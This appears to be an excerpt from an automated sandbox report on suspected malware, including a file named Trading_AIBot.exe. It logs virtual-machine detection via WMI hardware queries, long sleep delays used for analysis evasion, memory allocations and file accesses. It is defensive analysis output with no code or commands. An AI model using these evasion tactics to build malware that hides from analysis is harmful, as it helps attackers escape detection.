                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: D00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2980000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4980000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2DBB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2BE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 3250000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 25F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 24B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 4E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 10D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: A80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 25D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,9_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2920
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 2205
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 7627
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 434
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeAPI coverage: 9.1 %
                      Source: C:\Windows\SysWOW64\esentutl.exe TID: 2804Thread sleep count: 99 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6348Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6764Thread sleep count: 53 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -99332s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -99013s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -98821s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -98603s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -98405s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -98216s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -97896s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -97688s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -97510s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -97337s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716Thread sleep time: -97130s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1868Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep count: 2920 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4824Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 3572Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 6760Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2460Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep count: 39 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5240Thread sleep count: 2205 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5240Thread sleep count: 7627 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99547s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -198874s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98998s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97687s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97250s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97030s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -99172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98514s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -98078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97967s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97859s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97637s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97202s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424Thread sleep time: -97094s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4012Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5816Thread sleep time: -26040000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5816Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,2_2_02DB5908
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99332Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99013Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98821Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98603Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98405Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98216Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97896Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97688Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97510Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97337Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97130Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99765
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99656
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99547
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99437
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99218
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99109
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98998
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98890
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98781
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98672
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98562
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98453
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98344
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98234
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98125
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98015
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97906
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97797
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97687
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97578
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97469
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97359
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97250
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97140
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97030
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99781
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99672
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99327
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99172
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98812
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98625
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98514
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98406
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98297
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98187
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98078
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97967
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97859
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97750
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97637
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97531
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97422
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97312
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97202
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97094
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
